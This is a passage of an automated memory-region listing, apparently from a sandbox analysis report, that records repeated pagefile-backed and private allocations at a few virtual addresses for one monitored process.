"pagefile_0x0000000000530000" filename = "" Region: id = 16460 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16461 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16462 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16463 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16464 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16465 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16466 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16467 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16468 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16469 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16470 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16471 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16472 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16473 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16474 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16475 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16476 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16477 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16478 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16479 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16480 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16481 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16482 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16483 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 16484 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16485 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16486 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16487 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16488 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16489 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16490 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16491 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16492 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16493 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16494 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16495 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16496 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16497 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16498 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16499 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16500 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16501 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16502 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16503 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16504 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16505 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16506 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16507 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16508 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16509 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16510 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16511 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16512 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16513 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16514 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16515 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16516 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16517 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16518 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16519 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16520 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16521 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16522 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16523 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16524 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16525 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16526 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16527 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16528 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16529 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16530 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16531 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16532 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16533 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16534 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16535 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16536 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16537 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16538 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16539 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16540 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16541 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16542 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16543 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16544 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16545 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16546 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16547 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16548 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16549 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16550 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16551 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16552 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 16553 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16554 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16555 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16556 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16557 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16558 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16559 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16560 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16561 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16562 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16563 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16564 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16565 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16566 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16567 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16568 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16569 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16570 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16571 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16572 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16573 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16574 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16575 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16576 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16577 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16578 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16579 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16580 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16581 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16582 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16583 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16584 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16585 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16586 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16587 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16588 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16589 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16590 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16591 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16592 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16593 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16594 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16595 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16596 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 16597 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16598 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16599 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16600 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16601 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 16602 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 16603 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16604 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16605 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16606 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16607 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16608 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16609 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16610 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16611 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16612 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16613 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16614 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16615 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16616 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16617 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16618 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16619 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16620 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16621 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16622 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16623 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16624 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16625 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16626 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16627 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 16628 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16629 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16630 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16631 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16632 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16633 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16634 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16635 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16636 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16637 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16638 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16639 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16640 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16641 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16642 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16643 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16644 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16645 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16646 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 16647 start_va = 0x530000 end_va = 